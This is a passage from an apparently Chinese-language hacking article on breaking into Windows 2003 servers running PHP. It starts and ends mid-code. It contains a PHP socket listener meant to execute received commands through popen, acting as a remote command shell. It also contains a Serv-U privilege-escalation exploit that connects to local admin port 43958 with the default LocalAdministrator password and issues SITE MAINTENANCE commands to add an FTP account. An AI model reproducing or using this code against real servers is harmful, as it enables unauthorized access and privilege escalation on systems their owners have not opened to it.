突破Windows 2003 PHP服务器的新思路
= socket_listen($sock, 5)) < 0) {
echo "socket_listen() failed: reason: " . socket_strerror($ret) . "\n"; } do { if (($msgsock = socket_accept($sock)) < 0) { echo "socket_accept() failed: reason: " . socket_strerror($msgsock) . "\n"; break; } /* Send instructions. */ $msg = "\nWelcome to the PHP Test Server. \n" . "To quit, type ''quit''. To shut down the server type ''shutdown''.\n"; socket_write($msgsock, $msg, strlen($msg)); do { if (false === socket_recv($msgsock, $buf , 1024, 0)) { echo "socket_read() failed: reason: " . socket_strerror($ret) . "\n"; break 2; } if (!$buf = trim($buf)) { continue; } if ($buf == ''quit'') { break; } if ($buf == ''shutdown'') { socket_close($msgsock); break 2; } $talkback = "PHP: You said ''$buf''.\n"; socket_write($msgsock, $talkback, strlen($talkback)); echo "$buf\n"; //以下处理接受到的buf /*eg:例如 $buf=”cmd.exe /c netstat –an”; $pp = popen(''$buf '', ''r''); While($read = fgets($pp, 2096)) echo $read; pclose($pp); */ } while (true); socket_close($msgsock); } while (true); socket_close($sock); ?> 事实上,很多主机都是没有加载php_sockets.dll的,庆幸的是,不需要socket模块支持的“fsockopen”函数已经足够我们使用了。因为只要有“fsockopen”,我们便可以自由地读写本机中未对外部开放的端口。使用fsockopen读写serv-u 的本地管理端口43958 (注: 该端口无法在外部连结) 进行提权便是一个很典型的例子: $adminuser=” LocalAdministrator”; $adminpass=” #l@$ak#.lk;0@P”; $adminport=” 43958”; $fp = fsockopen ("127.0.0.1",$adminport,$errno, $errstr, 8); if (!$fp) { echo "$errstr ($errno) \n"; } else { //可以写入$shellcode // fputs ($fp, $shellcode); fputs ($fp, "USER ".$adminuser."\r\n"); sleep (1); fputs ($fp, "PASS ".$adminpass."\r\n"); sleep (1); fputs ($fp, "SITE MAINTENANCE\r\n"); sleep (1); fputs ($fp, "-SETUSERSETUP\r\n"); fputs ($fp, "-IP=".$addr."\r\n"); fputs ($fp, "-PortNo=".$ftpport."\r\n"); fputs ($fp, "-User=".$user."\r\n"); fputs ($fp, "-Password=".$password."\r\n"); fputs ($fp, "-HomeDir=".$homedir."\r\n"); fputs ($fp, "-LoginMesFile=\r\n"); fputs ($fp, "-Disable=0\r\n"); fputs ($fp, "-RelPaths=0\r\n"); fputs ($fp, "-NeedSecure=0\r\n"); fputs ($fp, "-HideHidden=0\r\n"); fputs ($fp, 
"-AlwaysAllowLogin=0\r\n"); fputs ($fp, "-ChangePassword=1\r\n"); fputs ($fp, "-QuotaEnable=0\r\n"); fputs ($fp, "-MaxUsersLoginPerIP=-1\r\n"); fputs ($fp, "-SpeedLimitUp=-1\r\n"); fputs ($fp, "-SpeedLimitDown=-1\r\n"); fputs ($fp, "-MaxNrUsers=-1\r\n"); fputs ($fp, "-IdleTimeOut=600\r\n"); fputs ($fp, "-SessionTimeOut=-1\r\n"); fputs ($fp, "-Expire=0\r\n"); fputs ($fp, "-RatioUp=1\r\n"); fputs ($fp, "-RatioDown=1\r\n"); fputs ($fp, "-RatiosCredit=0\r\n"); |